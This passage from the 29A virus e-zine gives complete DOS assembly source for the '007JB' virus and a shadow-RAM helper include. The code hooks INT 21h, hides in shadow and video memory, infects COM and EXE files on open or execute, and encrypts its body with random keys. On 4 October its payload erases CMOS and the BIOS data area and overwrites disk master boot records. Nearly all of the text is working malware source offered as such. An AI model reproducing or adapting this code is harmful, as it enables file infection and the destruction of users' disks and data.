Copy Link
Add to Bookmark
Report
29A Issue 03 06 01
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[007.asm]ÄÄ
;DEBUG equ TRUE
;ssssoooo
cc_loader_ptr equ 007005E0h
cc_video_ptr equ 0AE000100h
cc_shadow_ptr equ 0C6F00100h
cc_temp_ptr equ 0BE000100h
file_id_offs equ 12h
file_id equ '07'
magic_i equ 829Ah
magic_o equ 829Bh
o equ (word ptr 0)
s equ (word ptr 2)
mve macro x, y
push y
pop x
endm
dta_struc struc
; internal
dta_driveletter db ? ; 0=A:
dta_name8 db 8 dup (?) ;
dta_ext3 db 3 dup (?) ;
dta_searchattr db ? ;
dta_direntrynum dw ? ; 0=. 1=..
dta_dircluster dw ?
dd ? ; unused
; public
dta_attr db ? ; 1=r 32=a 16=d 2=h 4=s 8=v
dta_time dw ? ; çççç第¬ ¬¬¬ááááá
dta_date dw ? ; £££££££¬ ¬¬¬¤¤¤¤¤
dta_size dd ?
dta_name db 13 dup (?)
ends
exe_struc struc
exe_mz dw ? ; MZ/ZM
exe_last512 dw ?
exe_num512 dw ?
exe_relnum dw ?
exe_headersize dw ? ; in PAR
exe_minmem dw ?
exe_maxmem dw ?
exe_ss dw ?
exe_sp dw ?
exe_checksum dw ? ; 0
exe_ip dw ?
exe_cs dw ?
exe_relofs dw ?
exe_ovrnum dw ? ; 0
db 32 dup (?)
exe_neptr dd ?
ends
model small
p386
locals __
jumps
code segment word public use16
assume cs:code, ds:code, es:code, ss:code
org 100h
start:
c1_start:
call initialize
db 13,10
db '007JB.'
db virsize / 1000 mod 10 + '0'
db virsize / 100 mod 10 + '0'
db virsize / 10 mod 10 + '0'
db virsize / 1 mod 10 + '0'
db ' virus ver.1.01.2[Beta] copyright (c) 1998 by 007JB',13,10
db 'thanx to Z0MBiE/29A & S.S.R.',13,10
db 13,10
c1_size equ $-c1_start
com_start: call code_unxor
c2_start:
call antiweb
pusha
call sux
orig db 64 dup (?)
orig_size equ $-orig
sux: pop si
mov di, 100h
mov cx, orig_size
rep movsb
mov si, 1234h
start_ptr equ word ptr $-2
mov ax, cs
add ax, 1000h
mov es, ax
mov di, 100h
mov cx, virsize
rep movsb
popa
push cs
push 0100h
push es
push offset tsr
retf
c2_size equ $-c2_start
exe_start: call code_unxor
c3_start:
call antiweb
push ax
mov ax, es
add cs:save_cs, ax
add cs:save_ss, ax
pop ax
push cs
call tsr
lss sp, cs:save_sssp
db 0eah
save_ip dw ?
save_cs dw ?
antiweb: nop
nop
ret
save_sssp label dword
save_sp dw ?
save_ss dw ?
dosver db ?
c3_size equ $-c3_start
code_unxor: pusha
mov bx, 1234h
zero_ptr equ word ptr $-2
in al, 40h
and ax, 7
mov dx, ax
add dl, 88h
__1: in al, 40h
or al, al
jz __1
mov ah, al
out dx, al
in al, dx
sub al, ah
cbw
ror ax, 1
lea dx, code_w_unxor[bx]
sub dx, ax
call code_calldx
popa
ret
code_calldx: lea si, c1_start
mov cx, c1_size
call dx
lea si, c2_start
mov cx, c2_size
call dx
lea si, c3_start
mov cx, c3_size
call dx
lea si, c4_start
mov cx, c4_size
call dx
ret
code_w_unxor: shr cx, 1
__1: add word ptr cs:[si+bx], 1111h
add_word equ word ptr $-2
xor word ptr cs:[si+bx], 2222h
xor_word equ word ptr $-2
sub word ptr cs:[si+bx], 3333h
sub_word equ word ptr $-2
inc si
inc si
loop __1
ret
c4_start:
code_xor: pusha
lea dx, code_w_xor
call code_calldx
popa
ret
code_w_xor: shr cx, 1
add si, cryptedvir-start
__1: mov ax, sub_word
add [si], ax
mov ax, xor_word
xor [si], ax
mov ax, add_word
sub [si], ax
inc si
inc si
loop __1
ret
tsr: pusha ; FAR
push ds es
mve ds, cs
cld
mov ah, 2ah
int 21h
cmp dx, 0A04h ; 4 oct.
je kill_em
mov ax, magic_i
int 21h
cmp ax, magic_o
je __exit
mov ax, 3306h
int 21h
cmp bl, 7
je __dos7
cmp bl, 6
jne __exit
__dos7: mov dosver, bl
mov ax, 1130h
mov bh, 2
int 10h
mov ax, es
add bp, 15
and bp, 0fff0h
shr bp, 4
add ax, bp
sub ax, 16
mov shadow_ptr.s, ax
mov shadow_ptr.o, 0100h
mov ax, 3521h
int 21h
mov old21.o, bx
mov old21.s, es
mov ax, 3508h
int 21h
mov old08.o, bx
mov old08.s, es
mov al, 3
out 80h, al
out 81h, al
mov al, 0ffh
out 87h, al
call move_to_shadow
cmp dosver, 7
je __skip1
call move_to_vga
les di, loader_ptr
mve ds, cs
lea si, loader
mov cx, loader_size
rep movsb
__skip1:
mov ax, 2503h
lds dx, cs:shadow_ptr
add dx, int03-start
int 21h
mov ax, 2508h
mov ds, cs:shadow_ptr.s
lea dx, int08
int 21h
mov ax, 2521h
lds dx, cs:loader_ptr
cmp cs:dosver, 7
jne __skip2
mov ds, cs:shadow_ptr.s
lea dx, alt_21
__skip2: int 21h
__exit: pop es ds
popa
retf
kill_em: IFDEF DEBUG
int 3
ELSE
nop
ENDIF
call kill_40
call kill_cmos
mve es, cs
lea bx, mbr
call kill_mbr
db 0eah
dd 0f000fff0h
mbr: cli
xor bx, bx
mov ss, bx
mov sp, 7c00h
sti
call kill_40
mov ds, bx
mov es, bx
call kill_cmos
mov bx, 7c00h
call kill_mbr
call pop_msg
db 13,10
db 13,10
db ' ¢®â ⥯¥àì âë, ¯®£ ë© î§¥à, ¢¥áì ¢ ¤¥à쬥.',13,10
db ' ªâ® à §£à¥¡ ¥â ¤¥à쬮? , íâ® ®, è § áâ¥ç¨¢ë©, ã¡®£¨© ¤àã£. ;)))',13,10
db ' ¥¬ã ¯® 室ã íâ® à ¢¨âáï...',13,10
db '®«ç¨â. âëëëë뤮.
.',13,10
db '¤ , ¨£®à¥ª. ¤¥ ¦¥ ¢¥¡-⮠⢮©?... ª ª ¢á¥£¤ ;)',13,10
db ' ª®¤ § 祬 ᯨ$¤¨« ¨§ ?',13,10
db 'çâ®, á ¬®¬ã á« ¡®? ííå âë, ¯¨§$¨«-â®, çâ® ® ªàã⮩... ®-£®¢#®...',13,10
db 0
kill_40: mve es, 40h
xor di, di
mov cx, 256
xor al, al
cld
rep stosb
ret
kill_cmos: xor ax, ax
__1: out 70h, al
out 71h, al
inc al
jnz __1
ret
kill_mbr: mov dx, 0000h
call __1
inc dx
call __1
mov dx, 0080h
call __1
inc dx
__1: mov ax, 0301h
mov cx, 0001h
int 13h
ret
pop_msg: pop si
cld
__1: lodsb
mov ah, 0eh
mov bx, 7
int 10h
or al, al
jnz __1
loader_ptr dd cc_loader_ptr
loader: pusha
push ds es
call port_set
db 0eah
video_ptr dd cc_video_ptr
port_set: mov dx, 03c4h
mov ax, 0402h
out dx, ax
mov ax, 0704h
out dx, ax
mov dx, 03ceh
mov ax, 0005h
out dx, ax
mov ax, 0406h
out dx, ax
mov ax, 0204h
out dx, ax
ret
loader_size equ $-loader
port_reset: mov dx, 03c4h
mov ax, 0302h
out dx, ax
mov ax, 0304h
out dx, ax
mov dx, 03ceh
mov ax, 1005h
out dx, ax
mov ax, 0e06h
out dx, ax
mov ax, 0004h
out dx, ax
ret
db 20 dup (0f6h)
i = $
org mbr + 512 - 2
dw 0aa55h
org i
shadow_ptr dd cc_shadow_ptr
invideo: call move_to_shadow
push cs:shadow_ptr.s
mov ax, cs:shadow_ptr.o
add ax, inshadow-start
push ax
retf
move_to_vga: in al, 81h
or al, al
jz __exit
dec al
out 81h, al
call port_set
mve ds, cs
les di, video_ptr
lea si, start
mov cx, virsize
cld
rep movsb
db 09ah
dd cc_video_ptr + check_me-start
call port_reset
__exit: ret
check_me: IFDEF DEBUG
nop
nop
nop
ELSE
db 0cdh,03h
db 0cch
ENDIF
retf
move_to_shadow: in al, 80h
or al, al
jz __exit
dec al
out 80h, al
call shadow_open
mve ds, cs
lea si, start
les di, shadow_ptr
mov cx, virsize
cld
rep movsb
call shadow_close
__exit: ret
inshadow: call port_reset
pop es ds
popa
alt_21: cmp ax, magic_i
je ax_magic_i
cmp ah, 04Bh
je infect_dsdx
cmp ah, 03Dh
je infect_dsdx
cmp ah, 043h
je infect_dsdx
cmp ah, 056h
je infect_dsdx
int21_exit: db 0eah
old21 dd ?
ax_magic_i: IFDEF DEBUG
int 3
ELSE
nop
ENDIF
mov ax, magic_o
iret
;;
shadow_open: pushf
cli
call reg_save
call get_sh_state
or sh_w, seg_c000_32k
and sh_c, NOT seg_c000_32k
call set_sh_state
call reg_load
popf
ret
int03: nop
nop
iret
shadow_close: pushf
cli
call reg_save
call get_sh_state
and sh_w, NOT seg_c000_32k
or sh_c, seg_c000_32k
call set_sh_state
call reg_load
popf
ret
reg_save: mov cs:save_eax, eax
mov cs:save_ebx, ebx
mov cs:save_ecx, ecx
mov cs:save_edx, edx
mov cs:save_esi, esi
mov cs:save_edi, edi
mov cs:save_ebp, ebp
ret
reg_load: mov eax, cs:save_eax
mov ebx, cs:save_ebx
mov ecx, cs:save_ecx
mov edx, cs:save_edx
mov esi, cs:save_esi
mov edi, cs:save_edi
mov ebp, cs:save_ebp
ret
save_eax dd ?
save_ebx dd ?
save_ecx dd ?
save_edx dd ?
save_esi dd ?
save_edi dd ?
save_ebp dd ?
locals @@
include sh.inc
locals __
;;
infect_dsdx: pusha
push ds es
in al, 87h
cmp al, 7
je __exit
mov ah, 0fh
int 10h
cmp al, 3
jne __exit
lea si, start
les di, cs:temp_ptr
mov cx, virsize
cld
segcs
rep movsb
db 09ah
dd cc_temp_ptr + infect_file-start
__exit: pop es ds
popa
jmp int21_exit
temp_ptr dd cc_temp_ptr
infect_file: IFDEF DEBUG
int 3
ELSE
nop
ENDIF
mov al, 7
out 87h, al
mov ah, 60h
mov si, dx
mve es, cs
lea di, filename
call call21
mve ds, cs
lea si, filename
cld
__1: lodsb
or al, al
jnz __1
sub si, 1+3+1
lodsd
or eax, 20202000h
cmp eax, 'moc.'
jne __2
call infect_com
jmp __exit
__2: cmp eax, 'exe.'
jne __3
call infect_exe
jmp __exit
__3:
__exit: mov al, 0FFh
out 87h, al
IFDEF DEBUG
int 3
ELSE
nop
ENDIF
retf
call21: pushf
call cs:old21
ret
file_init: mov ah, 2fh
call call21
push es
push bx
mov ah, 1ah
mve ds, cs
lea dx, dta
call call21
mov ah, 4eh
lea dx, filename
mov cx, 1+2+4+32
call call21
mov ah, 1ah
pop dx
pop ds
call call21
mve ds, cs
ret
file_open: cmp dosver, 7
jne __1
mov ax, 4301h
lea dx, filename
xor cx, cx
call call21
jc __exit
mov ax, 3d02h
jmp __2
__1: mov ax, 3d00h
__2: lea dx, filename
call call21
jc __exit
xchg bx, ax
__exit: ret
file_close: mve ds, cs
mov ah, 3eh
call call21
jc __exit
cmp dosver, 7
jne __exit
mov ax, 4301h
xor cx, cx
mov cl, dta.dta_attr
lea dx, filename
call call21
__exit: ret
infect_com: call file_init
jc __exit
call check_avail
jc __exit
call file_open
jc __exit
mov ah, 3fh
lea dx, orig
mov cx, orig_size
call call21
cmp orig.word ptr file_id_offs, file_id
je __settime
mov ax, 4202h
cwd
xor cx, cx
call call21
push ax
mov zero_ptr, ax
add ax, 100h
mov start_ptr, ax
pop ax
lea si, orig
lea di, compatch
mov cx, orig_size
mve es, cs
cld
rep movsb
mov compatch.byte ptr 0, 0E9h
add ax, com_start-start - 3
mov compatch.word ptr 1, ax
mov compatch.word ptr file_id_offs, file_id
call infect_1
mov ah, 40h
lea dx, compatch
mov cx, orig_size
call call21
inc com_counter
__settime: call set_v_time
__close: call file_close
__exit: ret
set_v_time: call fuck_sft
mov ax, 5701h
mov dx, dta.dta_date
mov cx, dx
xchg ch, cl
call call21
ret
fuck_sft: pusha
cmp cs:dosver, 7
je __exit
mov ax, 1220h
int 2fh
mov bl, es:[di]
mov ax, 1216h
int 2fh
mov es:[di].word ptr 2, 0002h
__exit: popa
ret
com_counter dw 8 ; hehe
exe_counter dw 31
check_avail: mov ax, dta.dta_size.o
mov dx, dta.dta_size.s
or dx, dx
jnz __exit
cmp ax, 300
jbe __exit
cmp ax, 65536-256-2 - virsize
ja __exit
mov cx, 1000
div cx
cmp dx, 7
jbe __exit
mov dx, dta.dta_date
mov cx, dx
xchg ch, cl
cmp cx, dta.dta_time
je __exit
clc
ret
__exit: stc
ret
infect_exe: call file_init
jc __exit
call check_avail
jc __exit
call file_open
jc __exit
mov ah, 3fh
lea dx, exe
mov cx, size exe_struc
call call21
cmp exe.word ptr file_id_offs, file_id
je __settime
mov ax, exe.exe_mz
cmp ax, 'ZM'
jne __close
mov ax, exe.exe_num512
dec ax
jz __close
xor dx, dx
mov cx, 512
mul cx
add ax, exe.exe_last512
jc __close
cmp ax, dta.dta_size.word ptr 0
jne __close
mov ax, exe.exe_ss
add ax, 16
mov save_ss, ax
mov ax, exe.exe_sp
mov save_sp, ax
mov ax, exe.exe_cs
add ax, 16
mov save_cs, ax
mov ax, exe.exe_ip
mov save_ip, ax
mov ax, dta.dta_size.word ptr 0
mov cx, exe.exe_headersize
shl cx, 4
sub ax, cx
add ax, 15
and ax, 0fff0h
shr ax, 4
sub ax, 16
mov exe.exe_cs, ax
mov exe.exe_ip, offset exe_start
mov exe.exe_ss, ax
mov exe.exe_sp, offset exe_sptr
mov exe.word ptr file_id_offs, file_id
mov zero_ptr, 0
mov start_ptr, 100h
mov si, dta.dta_size.word ptr 0
add si, 15
and si, 0fff0h
mov ax, si
add ax, virsize
jc __close
xor dx, dx
mov cx, 512
div cx
inc ax
mov exe.exe_num512, ax
mov exe.exe_last512, dx
mov ax, exe.exe_minmem
add ax, exememory
jnc __1
mov ax, -1
__1: mov exe.exe_minmem, ax
mov ax, exe.exe_maxmem
add ax, exememory
jnc __2
mov ax, -1
__2: mov exe.exe_maxmem, ax
mov ax, 4200h
mov dx, si
xor cx, cx
call call21
call infect_1
mov ah, 40h
lea dx, exe
mov cx, size exe_struc
call call21
inc exe_counter
__settime: call set_v_time
__close: call file_close
__exit: ret
infect_1: call fuck_sft
call random
mov xor_word, ax
call random
mov add_word, ax
call random
mov sub_word, ax
lea si, start
lea di, cryptedvir
mve es, cs
mov cx, virsize
cld
rep movsb
call code_xor
mov ah, 40h
lea dx, cryptedvir
mov cx, virsize
call call21
mov ax, 4200h
cwd
xor cx, cx
call call21
ret
random: push bx
mov bx, 1234h
rndword equ word ptr $-2
in al, 40h
xor bl, al
in al, 40h
add bh, al
in al, 41h
sub bl, al
in al, 41h
xor bh, al
in al, 42h
add bl, al
in al, 42h
sub bh, al
; mov cs:rndword, bx
xchg bx, ax
pop bx
test al, 1
ret
int08: nop
nop
db 0eah
old08 dd ?
db 16 dup (0F6h)
c4_size equ $-c4_start
virsize equ $-start
codeend:
even
filename db 256 dup (?)
compatch db orig_size dup (?)
dta dta_struc ?
exe exe_struc ?
cryptedvir db virsize+1 dup (?)
even
db 512 dup (?)
exe_sptr:
exememory equ ($-codeend+15)/16
initialize: mov start.byte ptr 0, 0E9h
mov start.word ptr 1, invideo-(start+3)
push cs
call tsr
mov ax, 4c00h
int 21h
code ends
end start
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[007.asm]ÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[sh.inc]ÄÄ
; ÚÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ unused
; ³³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ reserved
;
; BX=readable 00x? xxxx xxxx xxxx B
; CX=writeable 00x? xxxx xxxx xxxx B
; DX=cacheable 00x? xxxx xxxx xxxx B
; SI=reserved 00x? xxxx xxxx xxxx B
;
; ³ ³³³³ ³³³³ ³³³ÀÄÄ EC00, 16K
; ³ ³³³³ ³³³³ ³³ÀÄÄÄ E800, 16K
; ³ ³³³³ ³³³³ ³ÀÄÄÄÄ E400, 16K
; ³ ³³³³ ³³³³ ÀÄÄÄÄÄ E000, 16K
; ³ ³³³³ ³³³³
; ³ ³³³³ ³³³ÀÄÄÄÄÄÄÄ DC00, 16K
; ³ ³³³³ ³³ÀÄÄÄÄÄÄÄÄ D800, 16K
; ³ ³³³³ ³ÀÄÄÄÄÄÄÄÄÄ D400, 16K
; ³ ³³³³ ÀÄÄÄÄÄÄÄÄÄÄ D000, 16K
; ³ ³³³³
; ³ ³³³ÀÄÄÄÄÄÄÄÄÄÄÄÄ CC00, 16K
; ³ ³³ÀÄÄÄÄÄÄÄÄÄÄÄÄÄ C800, 16K
; ³ ³ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄ C400, 16K
; ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ C000, 16K
; ³
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ F000, 64k
sh_R equ bx
sh_W equ cx
sh_C equ dx
sh_X equ si
seg_all equ 0010111111111111b
seg_F000_64k equ 0010000000000000b
seg_C000_64k equ 0000111100000000b
seg_C000_32k equ 0000110000000000b
seg_C800_32k equ 0000001100000000b
seg_C000_16k equ 0000100000000000b
seg_C400_16k equ 0000010000000000b
seg_C800_16k equ 0000001000000000b
seg_CC00_16k equ 0000000100000000b
seg_D000_64k equ 0000000011110000b
seg_D000_32k equ 0000000011000000b
seg_D800_32k equ 0000000000110000b
seg_D000_16k equ 0000000010000000b
seg_D400_16k equ 0000000001000000b
seg_D800_16k equ 0000000000100000b
seg_DC00_16k equ 0000000000010000b
seg_E000_64k equ 0000000000001111b
seg_E000_32k equ 0000000000001100b
seg_E800_32k equ 0000000000000011b
seg_E000_16k equ 0000000000001000b
seg_E400_16k equ 0000000000000100b
seg_E800_16k equ 0000000000000010b
seg_EC00_16k equ 0000000000000001b
read_cf8:
cf8_read: mov ax, 8000h
shl eax, 10h
mov ax, cx
and al, not 3
mov dx, 0CF8h
out dx, eax
add dl, 4
mov al, cl
and al, 3
add dl, al
in al, dx
ret
write_cf8:
cf8_write: xchg ax, cx
shl ecx, 10h
xchg ax, cx
mov ax, 8000h
shl eax, 10h
mov ax, cx
and al, not 3
mov dx, 0CF8h
out dx, eax
add dl, 4
mov al, cl
and al, 3
add dl, al
shr ecx, 10h
mov ax, cx
out dx, al
ret
get_sh_state: mov di, 0059h
@@1: push cx dx
mov cx, di
call cf8_read
pop dx cx
mov ah, 2
@@2: shl al, 1
rcl si, 1
shl al, 1
rcl dx, 1
shl al, 1
rcl cx, 1
shl al, 1
rcl bx, 1
dec ah
jnz @@2
inc di
cmp di, 005fh
jbe @@1
ret
set_sh_state: mov di, 005Fh
@@1: mov ah, 2
@@2: shr bx, 1
rcr al, 1
shr cx, 1
rcr al, 1
shr dx, 1
rcr al, 1
shr si, 1
rcr al, 1
dec ah
jnz @@2
push cx dx
mov cx, di
call cf8_write
pop dx cx
dec di
cmp di, 0059h
jae @@1
ret
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[sh.inc]ÄÄ
